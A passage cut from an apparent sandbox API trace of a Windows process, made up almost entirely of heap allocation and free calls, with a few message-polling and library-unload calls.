| out: hHeap=0x8a0000) returned 1 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.532] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.532] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0158.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0158.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0158.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0158.534] FreeLibrary (hLibModule=0x75990000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0158.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0158.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0158.535] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0158.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26a8 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4c0 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0158.536] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2638 [0158.536] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.536] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded08 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded80 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded30 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee48 | out: hHeap=0x8a0000) returned 1 [0158.537] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deda8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.538] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0158.539] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0158.539] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0158.539] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b60 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0158.539] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d440 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0158.540] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0158.540] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0158.541] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0158.541] HeapFree (in: 